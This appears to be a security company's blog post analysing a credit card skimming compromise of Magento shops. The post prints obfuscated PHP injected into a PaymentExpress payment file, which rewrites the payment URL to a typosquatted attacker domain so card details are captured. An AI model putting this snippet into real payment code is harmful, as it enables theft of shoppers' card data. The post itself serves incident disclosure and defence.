We have seen it all when it comes to compromised sites: from silly defacements, to malware, spam, phishing and all sorts of injections. However, the bad guys are always looking to maximize their profits when they hack a site. Especially when it is an e-commerce site that processes credit cards online.
Credit Card Redirection
A new trick we are seeing being used on compromised e-commerce sites is credit card redirection. The attackers modify the flow of the payment process so that instead of just processing the card, they redirect all payment details to a domain they own so they can steal the card details.
This is often done very stealthy, with minimal changes to the site. Credit cards are very valuable in the black market, so the attackers try to stay on as long as possible without being detected.
Because of the nature of Magento websites, they are a big target. We are seeing sites having the credit card processing file modified to either email the credit card details or redirect them to a new domain. In this specific case, the file “app/code/community/MageBase/DpsPaymentExpress/Model/Method/Pxpay.php” (use for PaymentExpress payment handling) was modified with this code:
$oo = base64_decode(‘cGF5bWVudGV4cHJlc3M=’); $_oo = base64_decode("cGF5bWVudGlleHByZXNz’);$_is = base64_decode("c2Vzc19pZA==’);
$_oi = base64_decode("cHJlZ19yZXBsYWNl’);
$responseURI = $_oi(‘/’.$oo.’/’,$_oo,strval($responseXml->URI));
Which once decoded, replaces every occurrence of paymentexpress for paymentiexpress (see extra i). This forces the payment processing to be tunneled here:
https://sec.paymentiexpress.com/pxpay/pxaccess.aspx (see the i again)
Instead of the real URL:
This redirection forces all the transaction data, including credit card details (name, address, CC and CVV), through their malicious server, in turn allowing the data to be stolen by the bad guys.
The domain paymentiexpress.com was just registered a few days ago using whois privacy:
Registration Service Provided By: Namecheap.com
Registered through: eNom, Inc.
Creation date: 18 Jul 2013 18:02:00
Expiration date: 18 Jul 2014 18:02:00
And is currently live and not blacklisted by anyone (except us now). It has a proper SSL certificate (by RapidSSL) and everything that makes a trusted worthy phishing page.
What is also interesting is this new evolution of phishing, so that instead of tricking users into clicking into a bad url, it tricks the site itself to redirect the users information there.